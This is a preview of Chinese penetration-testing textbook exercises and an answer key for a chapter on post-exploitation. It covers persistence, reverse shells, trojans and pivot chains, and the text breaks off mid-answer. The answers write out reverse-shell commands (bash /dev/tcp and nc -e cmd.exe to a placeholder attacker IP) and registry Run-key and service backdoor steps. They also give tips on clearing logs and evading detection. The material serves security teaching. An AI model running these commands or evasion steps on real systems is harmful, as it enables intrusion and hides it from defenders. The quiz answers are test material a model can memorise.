滲透測試技術(shù)-第六章習(xí)題及參考答案_第1頁
滲透測試技術(shù)-第六章習(xí)題及參考答案_第2頁
滲透測試技術(shù)-第六章習(xí)題及參考答案_第3頁
全文預(yù)覽已結(jié)束

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

第六章習(xí)題一、單項(xiàng)選擇題1.在進(jìn)行后滲透測試時(shí),以下哪種操作不能幫助攻擊者維持對目標(biāo)系統(tǒng)的持久性控制?()A.創(chuàng)建綁定Shell或反彈Shell B.創(chuàng)建調(diào)度任務(wù)C.執(zhí)行ARP掃描 D.創(chuàng)建新用戶2.以下哪種情況不適用于使用反彈Shell?()A.目標(biāo)機(jī)器因防火墻受限,只能發(fā)送請求,不能接收請求B.目標(biāo)機(jī)器端口被占用C.目標(biāo)機(jī)器處于公共網(wǎng)絡(luò),IP地址固定,攻擊機(jī)器可以直接連接D.對于病毒、木馬,受害者何時(shí)能“中招”、對方的網(wǎng)絡(luò)環(huán)境是什么樣的、什么時(shí)候開關(guān)機(jī)等情況都是未知的3.關(guān)于權(quán)限維持的描述,以下哪項(xiàng)是不正確的?()A.權(quán)限維持是指攻擊者在成功入侵系統(tǒng)后,為了保持對該系統(tǒng)的持久訪問能力,使用各種技術(shù)和工具,繞過系統(tǒng)的安全機(jī)制B.Windows的輔助功能鏡像劫持是通過使用Windows內(nèi)置的調(diào)試功能IFEO(ImageFileExecutionOptions)來實(shí)現(xiàn)的C.在Windows權(quán)限維持中,啟動項(xiàng)/服務(wù)后門和系統(tǒng)計(jì)劃任務(wù)后門都需要攻擊者獲取系統(tǒng)管理員權(quán)限才能創(chuàng)建D.在Linux權(quán)限維持中,Crontab計(jì)劃任務(wù)后門是通過修改系統(tǒng)的/etc/crontab文件實(shí)現(xiàn)的4.以下哪種類型的木馬會模擬用戶點(diǎn)擊廣告等行為來獲取高額的廣告推廣費(fèi)用?()A.網(wǎng)游木馬 B.網(wǎng)銀木馬 C.下載類木馬 D.網(wǎng)頁點(diǎn)擊類木馬5.根據(jù)本章內(nèi)容,下列敘述中錯(cuò)誤的是()。A.在網(wǎng)絡(luò)攻擊后,攻擊者通常需要清除日志和操作記錄,以隱藏其入侵痕跡B.攻擊者常用的隱匿方式之一是“肉雞”和代理服務(wù)器混合組成的跳板鏈C.Socks5代理服務(wù)器僅能響應(yīng)HTTP通信協(xié)議,并過濾除80、8080等Web常用端口外的其他端口訪問請求D.Tor是許多攻擊者用來隱藏自己的工具二、簡答題1.請?jiān)敿?xì)解釋什么是后滲透,包括其目的、方法和在滲透測試中的重要性。說明在進(jìn)行后滲透測試時(shí),如何有效地隱藏攻擊行為,避免被系統(tǒng)管理員和安全設(shè)備檢測到。2.請?jiān)敿?xì)解釋反彈Shell的工作原理,以及在Linux和Windows系統(tǒng)下如何使用反彈Shell。3.簡述Windows權(quán)限維持中啟動項(xiàng)/服務(wù)后門的創(chuàng)建過程。4.請簡述木馬的兩個(gè)主要部分,并說明這兩部分是如何協(xié)同工作的。5.請簡述網(wǎng)絡(luò)攻擊者是如何利用跳板來隱藏自己的行蹤的。參考答案一、單項(xiàng)選擇題C.執(zhí)行ARP掃描不能幫助攻擊者維持對目標(biāo)系統(tǒng)的持久性控制。C.目標(biāo)機(jī)器處于公共網(wǎng)絡(luò),IP地址固定,攻擊機(jī)器可以直接連接的情況下,不適合使用反彈Shell。C.在Windows權(quán)限維持中,啟動項(xiàng)/服務(wù)后門和系統(tǒng)計(jì)劃任務(wù)后門不一定需要系統(tǒng)管理員權(quán)限才能創(chuàng)建。D.網(wǎng)頁點(diǎn)擊類木馬會模擬用戶點(diǎn)擊廣告行為來獲取廣告推廣費(fèi)用。C.Socks5代理服務(wù)器不僅能響應(yīng)HTTP協(xié)議,還可以處理其他協(xié)議,不會過濾除80、8080等Web常用端口外的其他端口訪問請求。二、簡答題1.后滲透定義與目的:后滲透是指在成功入侵目標(biāo)系統(tǒng)后,攻擊者進(jìn)行進(jìn)一步操作的階段,包括權(quán)限提升、信息收集、持久性控制等,目的是擴(kuò)展控制、獲取更多敏感信息。方法:創(chuàng)建后門、調(diào)度任務(wù)、收集密碼等操作;使用憑證竊取、橫向移動等手段訪問更多系統(tǒng)資源。重要性:后滲透能夠進(jìn)一步加深攻擊效果,同時(shí)確保攻擊者可以長期控制目標(biāo)系統(tǒng),實(shí)現(xiàn)持久性。隱藏攻擊行為:隱藏文件、日志清除、使用代理或跳板、加密通信、偽裝為合法進(jìn)程或服務(wù),繞過IDS/IPS等安全檢測工具,減少痕跡暴露。2.反彈Shell的工作原理原理:反彈Shell是指目標(biāo)主機(jī)主動連接攻擊者的控制端,將其Shell或命令行環(huán)境反彈到控制端,適用于目標(biāo)主機(jī)無法接受外部連接的情況。在Linux系統(tǒng)中使用:通常通過bash-i>&/dev/tcp/攻擊者IP/端口0>&1實(shí)現(xiàn),目標(biāo)主機(jī)的Shell會連接攻擊者監(jiān)聽的端口。在Windows系統(tǒng)中使用:可利用nc.exe實(shí)現(xiàn),命令如nc-ecmd.exe攻擊者IP端口,使得Windows目標(biāo)的cmd環(huán)境反彈到攻擊者控制端。3.Windows權(quán)限維持中啟動項(xiàng)/服務(wù)后門的創(chuàng)建過程創(chuàng)建啟動項(xiàng)后門:在注冊表的HKCU\Software\Microsoft\Windows\CurrentVersion\Run或HKLM\Software\Microsoft\Windows\CurrentVersion\Run中添加惡意程序路徑,使得系統(tǒng)啟動時(shí)自動執(zhí)行。創(chuàng)建服務(wù)后門:使用sccreate命令創(chuàng)建一個(gè)新的服務(wù),將惡意程序作為服務(wù)添加到系統(tǒng),服務(wù)啟動時(shí)即可執(zhí)行惡意代碼。4.木馬的主要部分控制端:攻擊者端,用于發(fā)送指令、控制木馬操作。受控端(客戶端):受害者系統(tǒng)中的木馬組件,負(fù)責(zé)接收控制端的指令,執(zhí)行相應(yīng)操作。協(xié)同工作方式:控制端通過網(wǎng)絡(luò)發(fā)送指令,受控端接收并執(zhí)行,如收集數(shù)據(jù)、遠(yuǎn)程控制。兩者通常通過加密連接保持隱蔽通信,避免被檢測。5.利用跳板隱藏行蹤跳板定義:攻擊者通過多個(gè)中間代理(跳板)進(jìn)行攻擊,每個(gè)跳板都是

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論